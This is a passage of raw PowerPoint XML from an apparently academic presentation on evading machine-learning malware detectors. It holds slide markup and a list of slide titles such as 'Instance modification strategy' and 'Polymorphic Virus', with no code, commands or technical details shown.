              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475164" y="3846637"/>
            <a:ext cx="4252912" cy="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798355" y="3308028"/>
            <a:ext cx="1606530" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390638243"/>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3808</TotalTime>
  <Words>1245</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>219</Paragraphs>
  <Slides>32</Slides>
  <Notes>11</Notes>
  <HiddenSlides>9</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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Wisp</vt:lpstr>
      <vt:lpstr>Evading the Machine Learning Detector: A Virus’ Perspective</vt:lpstr>
      <vt:lpstr>Problem Description</vt:lpstr>
      <vt:lpstr>Malicious Executable Dataset</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Data Preprocessing </vt:lpstr>
      <vt:lpstr>Data Preprocessing</vt:lpstr>
      <vt:lpstr>Model training</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Naïve Modification : Adding Single Attribute</vt:lpstr>
      <vt:lpstr>Instance modification strategy (1)</vt:lpstr>
      <vt:lpstr>Instance modification strategy (2)</vt:lpstr>
      <vt:lpstr>Test Result: Adding Highest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Removing Lowest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Combined</vt:lpstr>
      <vt:lpstr>vs. Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Disguise as Popular File Formats or Programs</vt:lpstr>
      <vt:lpstr>Disguise as Popular File Formats or Programs</vt:lpstr>
      <vt:lpstr>Polymorphic Virus</vt:lpstr>
      <vt:lpstr>Other Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Reference</vt:lpstr>
      <vt:lpstr>Conclusion &amp; Future Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Evaluation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250</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-22T19:51:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-14T13:41:07Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>